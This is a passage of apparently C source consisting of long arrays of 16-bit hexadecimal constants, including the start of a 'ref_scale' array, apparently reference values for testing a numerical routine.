0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x9f2b, 0x2885, 0x352f, 0xa9a2, 0xb839, 0x36ed, 0xb246, 0xa7e8, 0xb97d, 0xb8be, 0x3375, 0x3311, 0x3161, 0x395b, 0x2658, 0xb9a8, 0x30c4, 0xae52, 0x39a7, 0x32fa, 0xb81f, 0xb4bc, 0x3683, 0x2da0, 0x29bd, 0xb0c6, 0xb06e, 0x3a92, 0xb1a0, 0xb49c, 0xb9e3, 0xb76c, 0x3278, 0x2f8d, 0xb385, 0xb10f, 0x36d2, 0xaa37, 0xb16b, 0xb06f, 0xb721, 0x3370, 0xb1d1, 0x3b13, 0xae26, 0x3402, 0xb91b, 0xb387, 0x382c, 0xb8da, 0x32f4, 0xb38e, 0x36c2, 0x30e5, 0xb3a9, 0xb806, 0xbb06, 0xb89c, 0x3482, 0x304e, 0x350a, 0xab65, 0xb403, 0xb274, 0xb2ff, 0x2b9b, 0xb856, 0xab27, 0xb997, 0xb98a, 0xb602, 0x3c1a, 0xb9d2, 0x377a, 0x3518, 0x385f, 0xb64e, 0xb0f7, 0xb83e, 0x2b61, 0xb4be, 0x2ba6, 0xb43c, 0x34f9, 0x3a69, 0x23fb, 0xa1ce, 0x368e, 0x3361, 0x31fc, 0xb6a6, 0xaf92, 0xb794, 0xb992, 0xb227, 0xb1f4, 0xb5a8, 0x279d, 0xb0a2, 0x322d, 0x3500, 0x39eb, 0xb208, 0x99e8, 0x36e3, 0x3695, 0xbaa5, 0xb38c, 0x2a8f, 0x2d4b, 0x387e, 0x38a8, 0x318d, 0xb4cf, 0x3406, 0x1c86, 0xb0e1, 0xb145, 0x3846, 0x370f, 0x22ab, 0x3476, 0xb236, 0xb991, 0xb82d, 0x389b, 0x28c5, 0x31f4, 0xab54, 0x3296, 0xb94f, 0xb38b, 0xb4b8, 0xb2b0, 0xb744, 0xb84f, 0xb737, 0xb004, 0x3498, 0x280c, 0x25ee, 0x27c5, 0x33e3, 0xb957, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x9f2b, 0x2885, 0x352f, 0xa9a2, 0xb839, 0x36ed, 0xb246, 0xa7e8, 0xb97d, 0xb8be, 0x3375, 0x3311, 0x3161, 0x395b, 0x2658, 0xb9a8, 0x30c4, 0xae52, 0x39a7, 0x32fa, 0xb81f, 0xb4bc, 0x3683, 0x2da0, 0x29bd, 0xb0c6, 0xb06e, 0x3a92, 0xb1a0, 0xb49c, 0xb9e3, 0xb76c, 0x3278, 0x2f8d, 0xb385, 0xb10f, 0x36d2, 0xaa37, 0xb16b, 0xb06f, 0xb721, 0x3370, 0xb1d1, 0x3b13, 0xae26, 0x3402, 0xb91b, 0xb387, 0x382c, 0xb8da, 0x32f4, 0xb38e, 0x36c2, 0x30e5, 0xb3a9, 0xb806, 0xbb06, 0xb89c, 0x3482, 0x304e, 0x350a, 0xab65, 0xb403, 0xb274, 0xb2ff, 0x2b9b, 0xb856, 0xab27, 0xb997, 0xb98a, 0xb602, 0x3c1a, 0xb9d2, 0x377a, 0x3518, 0x385f, 0xb64e, 0xb0f7, 0xb83e, 0x2b61, 0xb4be, 0x2ba6, 0xb43c, 0x34f9, 0x3a69, 0x23fb, 0xa1ce, 0x368e, 0x3361, 0x31fc, 0xb6a6, 0xaf92, 0xb794, 0xb992, 0xb227, 0xb1f4, 0xb5a8, 0x279d, 0xb0a2, 0x322d, 0x3500, 0x39eb, 0xb208, 0x99e8, 0x36e3, 0x3695, 0xbaa5, 0xb38c, 0x2a8f, 0x2d4b, 0x387e, 0x38a8, 0x318d, 0xb4cf, 0x3406, 0x1c86, 0xb0e1, 0xb145, 0x3846, 0x370f, 0x22ab, 0x3476, 0xb236, 0xb991, 0xb82d, 0x389b, 0x28c5, 0x31f4, 0xab54, 0x3296, 0xb94f, 0xb38b, 0xb4b8, 0xb2b0, 0xb744, 0xb84f, 0xb737, 0xb004, 0x3498, 0x280c, 0x25ee, 0x27c5, 0x33e3, 0xb957, 0xad09, 0x3825, 0x3b4a, 0xb567, 0x35f9, 0x3633, 0x316c, 0xb585, 0x3001, 0xaf84, 0xb4ad, 0xb68a, 0xb82e, 0x3487, 0xb050, 0x2455, 0xb49a, 0xb065, 0xba78, 0x39b1, 0xb67d, 0xb447, 0xb4ad, 0xaa22, 0xb6c3, 0xb325, 0x392e, 0x3c43, 0x362e, 0x2890, 0xb0a7, 0x3284, 0xa9cf, 0xb52c, 0xb907, 0x2e89, 0xba20, 0xb3ae, 0x3489, 0x3063, 0x381d, 0x33ca, 0xb594, 0xb387, 0xb974, 0xb3a9, 0x3609, 0xb0a2, 0xb030, 0xb2ac, 0xb4fb, 0xb27b, 0xb4c0, 0x35d6, 0x3028, 0xb639, 0x3636, 0x36e9, 0xb1a5, 0x2edb, 0x37ac, 0xb7d3, 0x3833, 0xb537, 0x325c, 0xa40e, 0xbb1b, 0xacfc, 0x3132, 0x2f4b, 0xba54, 0x374d, 0x3528, 0xb34a, 0x3092, 0xb164, 0x3591, 0x2ebc, 0xb809, 0xb025, 0xb19e, 0x34c4, 0xac33, 0xacfc, 0xb5f8, 0xa997, 0x39f9, 0x2d1f, 0xb5ec, 0xb2d1, 0xa43d, 0x327b, 0x312a, 0x310c, 0xb604, 0x3046, 0xac78, 0xb939, 0xb443, 0xb2b1, 0x3516, 0xba17, 0xb850, 0xb337, 0xb46d, 0x3087, 0xb10c, 0x35be, 0xb43d, 0x3813, 0x2ece, 0x2447, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x9f2b, 0x2885, 0x352f, 0xa9a2, 0xb839, 0x36ed, 0xb246, 0xa7e8, 0xb97d, 0xb8be, 0x3375, 0x3311, 0x3161, 0x395b, 0x2658, 0xb9a8, 0x30c4, 0xae52, 0x39a7, 0x32fa, 0xb81f, 0xb4bc, 0x3683, 0x2da0, 0x29bd, 0xb0c6, 0xb06e, 0x3a92, 0xb1a0, 0xb49c, 0xb9e3, 0xb76c, 0x3278, 0x2f8d, 0xb385, 0xb10f, 0x36d2, 0xaa37, 0xb16b, 0xb06f, 0xb721, 0x3370, 0xb1d1, 0x3b13, 0xae26, 0x3402, 0xb91b, 0xb387, 0x382c, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x9f2b, 0x2885, 0x352f, 0xa9a2, 0xb839, 0x36ed, 0xb246, 0xa7e8, 0xb97d, 0xb8be, 0x3375, 0x3311, 0x3161, 0x395b, 0x2658, 0xb9a8, 0x30c4, 0xae52, 0x39a7, 0x32fa, 0xb81f, 0xb4bc, 0x3683, 0x2da0, 0x29bd, 0xb0c6, 0xb06e, 0x3a92, 0xb1a0, 0xb49c, 0xb9e3, 0xb76c, 0x3278, 0x2f8d, 0xb385, 0xb10f, 0x36d2, 0xaa37, 0xb16b, 0xb06f, 0xb721, 0x3370, 0xb1d1, 0x3b13, 0xae26, 0x3402, 0xb91b, 0xb387, 0x382c, 0xb8da, 0x32f4, 0xb38e, 0x36c2, 0x30e5, 0xb3a9, 0xb806, 0xbb06, 0xb89c, 0x3482, 0x304e, 0x350a, 0xab65, 0xb403, 0xb274, 0xb2ff, 0x2b9b, 0xb856, 0xab27, 0xb997, 0xb98a, 0xb602, 0x3c1a, 0xb9d2, 0x377a, 0x3518, 0x385f, 0xb64e, 0xb0f7, 0xb83e, 0x2b61, 0xb4be, 0x2ba6, 0xb43c, 0x34f9, 0x3a69, 0x23fb, 0xa1ce, 0x368e, 0x3361, 0x31fc, 0xb6a6, 0xaf92, 0xb794, 0xb992, 0xb227, 0xb1f4, 0xb5a8, 0x279d, 0xb0a2, 0x322d, 0x3500, 0x39eb, 0xb208, 0x99e8, 0x36e3, 0x3695, 0xbaa5, 0xb38c, 0x2a8f, 0x2d4b, 0x387e, 0x38a8, 0x318d, 0xb4cf, 0x3406, 0x1c86, 0xb0e1, 0xb145, 0x3846, 0x370f, 0x22ab, 0x3476, 0xb236, 0xb991, 0xb82d, 0x389b, 0x28c5, 0x31f4, 0xab54, 0x3296, 0xb94f, 0xb38b, 0xb4b8, 0xb2b0, 0xb744, 0xb84f, 0xb737, 0xb004, 0x3498, 0x280c, 0x25ee, 0x27c5, 0x33e3, 0xb957, 0xad09, 0x3825, 0x3b4a, 0xb567, 0x35f9, 0x3633, 0x316c, 0xb585, 0x3001, 0xaf84, 0xb4ad, 0xb68a, 0xb82e, 0x3487, 0xb050, 0x2455, 0xb49a, 0xb065, 0xba78, 0x39b1, 0xb67d, 0xb447, 0xb4ad, 0xaa22, 0xb6c3, 0xb325, 0x392e, 0x3c43, 0x362e, 0x2890, 0xb0a7, 0x3284, 0xa9cf, 0xb52c, 0xb907, 0x2e89, 0xba20, 0xb3ae, 0x3489, 0x3063, 0x381d, 0x33ca, 0xb594, 0xb387, 0xb974, 0xb3a9, 0x3609, 0xb0a2, 0xb030, 0xb2ac, 0xb4fb, 0xb27b, 0xb4c0, 0x35d6, 0x3028, 0xb639, 0x3636, 0x36e9, 0xb1a5, 0x2edb, 0x37ac, 0xb7d3, 0x3833, 0xb537, 0x325c, 0xa40e, 0xbb1b, 0xacfc, 0x3132, 0x2f4b, 0xba54, 0x374d, 0x3528, 0xb34a, 0x3092, 0xb164, 0x3591, 0x2ebc, 0xb809, 0xb025, 0xb19e, 0x34c4, 0xac33, 0xacfc, 0xb5f8, 0xa997, 0x39f9, 0x2d1f, 0xb5ec, 0xb2d1, 0xa43d, 0x327b, 0x312a, 0x310c, 0xb604, 0x3046, 0xac78, 0xb939, 0xb443, 0xb2b1, 0x3516, 0xba17, 0xb850, 0xb337, 0xb46d, 0x3087, 0xb10c, 0x35be, 0xb43d, 0x3813, 0x2ece, 0x2447, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x9f2b, 0x2885, 0x352f, 0xa9a2, 0xb839, 0x36ed, 0xb246, 0xa7e8, 0xb97d, 0xb8be, 0x3375, 0x3311, 0x3161, 0x395b, 0x2658, 0xb9a8, 0x30c4, 0xae52, 0x39a7, 0x32fa, 0xb81f, 0xb4bc, 0x3683, 0x2da0, 0x29bd, 0xb0c6, 0xb06e, 0x3a92, 0xb1a0, 0xb49c, 0xb9e3, 0xb76c, 0x3278, 0x2f8d, 0xb385, 0xb10f, 0x36d2, 0xaa37, 0xb16b, 0xb06f, 0xb721, 0x3370, 0xb1d1, 0x3b13, 0xae26, 0x3402, 0xb91b, 0xb387, 0x382c, 0xb8da, 0x32f4, 0xb38e, 0x36c2, 0x30e5, 0xb3a9, 0xb806, 0xbb06, 0xb89c, 0x3482, 0x304e, 0x350a, 0xab65, 0xb403, 0xb274, 0xb2ff, 0x2b9b, 0xb856, 0xab27, 0xb997, 0xb98a, 0xb602, 0x3c1a, 0xb9d2, 0x377a, 0x3518, 0x385f, 0xb64e, 0xb0f7, 0xb83e, 0x2b61, 0xb4be, 0x2ba6, 0xb43c, 0x34f9, 0x3a69, 0x23fb, 0xa1ce, 0x368e, 0x3361, 0x31fc, 0xb6a6, 0xaf92, 0xb794, 0xb992, 0xb227, 0xb1f4, 0xb5a8, 0x279d, 0xb0a2, 0x322d, 0x3500, 0x39eb, 0xb208, 0x99e8, 0x36e3, 0x3695, 0xbaa5, 0xb38c, 0x2a8f, 0x2d4b, 0x387e, 0x38a8, 0x318d, 0xb4cf, 0x3406, 0x1c86, 0xb0e1, 0xb145, 0x3846, 0x370f, 0x22ab, 0x3476, 0xb236, 0xb991, 0xb82d, 0x389b, 0x28c5, 0x31f4, 0xab54, 0x3296, 0xb94f, 0xb38b, 0xb4b8, 0xb2b0, 0xb744, 0xb84f, 0xb737, 0xb004, 0x3498, 0x280c, 0x25ee, 0x27c5, 0x33e3, 0xb957, 0xad09, 0x3825, 0x3b4a, 0xb567, 0x35f9, 0x3633, 0x316c, 0xb585, 0x3001, 0xaf84, 0xb4ad, 0xb68a, 0xb82e, 0x3487, 0xb050, 0x2455, 0xb49a, 0xb065, 0xba78, 0x39b1, 0xb67d, 0xb447, 0xb4ad, 0xaa22, 0xb6c3, 0xb325, 0x392e, 0x3c43, 0x362e, 0x2890, 0xb0a7, 0x3284, 0xa9cf, 0xb52c, 0xb907, 0x2e89, 0xba20, 0xb3ae, 0x3489, 0x3063, 0x381d, 0x33ca, 0xb594, 0xb387, 0xb974, 0xb3a9, 0x3609, 0xb0a2, 0xb030, 0xb2ac, 0xb4fb, 0xb27b, 0xb4c0, 0x35d6, 0x3028, 0xb639, 0x3636, 0x36e9, 0xb1a5, 0x2edb, 0x37ac, 0xb7d3, 0x3833, 0xb537, 0x325c, 0xa40e, 0xbb1b, 0xacfc, 0x3132, 0x2f4b, 0xba54, 0x374d, 0x3528, 0xb34a, 0x3092, 0xb164, 0x3591, 0x2ebc, 0xb809, 0xb025, 0xb19e, 0x34c4, 0xac33, 0xacfc, 0xb5f8, 0xa997, 0x39f9, 0x2d1f, 0xb5ec, 0xb2d1, 0xa43d, 0x327b, 0x312a, 0x310c, 0xb604, 0x3046, 0xac78, 0xb939, 0xb443, 0xb2b1, 0x3516, 0xba17, 0xb850, 0xb337, 0xb46d, 0x3087, 0xb10c, 0x35be, 0xb43d, 0x3813, 0x2ece, 0x2447, 0x2a98, 0xb5e6, 0xb74c, 0x374f, 0xb0b7, 0x295e, 0xb442, 0x38be, 0x3376, 0x371f, 0xb59f, 0x298a, 0xba0d, 0x2fb8, 0xb072, 0xb67d, 0x314c, 0x342a, 0x2421, 0x34ed, 0xb53a, 0xba8b, 0xb38d, 0xb529, 0x33a3, 0x3412, 0xb41f, 0xa175, 0xb008, 0xb26c, 0x2b8d, 0x3852, 0x37ef, 0xb860, 0x38eb, 0xb2d4, 0xb8b6, 0x31ab, 0xadeb, 0xb94a, 0x38b7, 0xb094, 0xb421, 0x2c91, 0xb8b0, 0x34f6, 0x3148, 0x3619, 0x3347, 0xaf80, 0xad14, 0x2c13, 0xaa64, 0xae1e, 0xa281, 0x3468, 0x35be, 0x2808, 0xb1a1, 0xb223, 0x367d, 0xaf90, 0x3709, 0xb50d, 0x3773, 0x3af5, 0x3854, 0x371f, 0x34d2, 0xb50e, 0xb7cb, 0xb68f, 0xa844, 0x2e9e, 0x35ac, 0x377d, 0xb87f, 0x3427, 0xb665, 0xb9c6, 0xb0ee, 0x34f8, 0xaed4, 0x34ae, 0x39e7, 0xb673, 0x378c, 0x2f9f, 0xb204, 0xad36, 0x3a1a, 0xae9b, 0xb221, 0xac0b, 0x3322, 0xb043, 0xa6dd, 0x31a3, 0x364e, 0xa9e9, 0x2866, 0xb83b, 0xadbe, 0x38fc, 0x1ec4, 0x3068, 0x3828, 0xad9d, 0x3687, 0xb4c8, 0xa45e, 0xb520, 0x375e, 0x2ccd, 0xb0e5, 0xb365, 0xb91d, 0xb148, 0x316d, 0xb803, 0xb503, 0xaccf, 0xb578, 0x32cb, 0xb316, 0xb3a1, 0xb2df, 0x3521, 0xb991, 0x21d9, 0xb8c1, 0xb680, 0xb22b, 0xb289, 0x38ee, 0x35c5, 0x343a, 0x3717, 0xb8d3, 0x37d8, 0x38db, 0xa714, 0xbc69, 0xb687, 0xb836, 0xb7a6, 0xb0c9, 0xafc5, 0xb3cf, 0x3872, 0x3cb4, 0xb31d, 0xb8a3, 0x3a40, 0xb7c3, 0xb955, 0xb56d, 0x381f, 0xb775, 0x3381, 0x3a6a }; static const uint16_t ref_scale[3136] = { 0x1bc8, 0x1bc8, 0xaca5, 0x1bc8, 0xaca5, 0xa8a3, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0x1bc8, 0xaca5, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 